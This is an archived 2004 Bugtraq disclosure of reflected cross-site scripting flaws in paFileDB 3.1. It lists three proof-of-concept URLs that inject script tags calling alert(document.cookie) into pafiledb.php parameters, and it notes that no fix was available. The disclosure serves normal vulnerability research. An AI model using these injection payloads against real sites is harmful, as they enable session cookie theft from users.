| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20040925135846.6711.qmail@web51003.mail.yahoo.com> Date: Sat, 25 Sep 2004 06:58:46 -0700 (PDT) From: alireza hassani <trueend5@...oo.com> To: bugtraq@...urityfocus.com Subject: New XSS vulnerabilities in paFileDB 3.1 final Another XSS Vulnerability has been found in paFileDB! paFileDB is designed to allow webmasters have a database of files for download on their site. Vulnerable: Software: email & category & file paFileDB modules Just Tested on: paFileDB 3.1 Final , but likely works on another versions. Exploit: http://site/downloads/pafiledb.php?action=email&id=1?%22><script>alert(document.cookie)</script> http://site/downloads/pafiledb.php?action=category&id=1?%22><script>alert(document.cookie)</script> http://site/downloads/pafiledb.php?action=file&id=1?%22><script>alert(document.cookie)</script> ------------------------------------------------------------------------------- Script authors not contacted for some reason therefore There is no solution at this time. ------------------------------------------------------------------------------- Discovered by trueend5 (trueend5@...oo.com) Additional information @ http://www.persianhacker.net _______________________________ Do you Yahoo!? Declare Yourself - Register online to vote today! http://vote.yahoo.com
Powered by blists - more mailing lists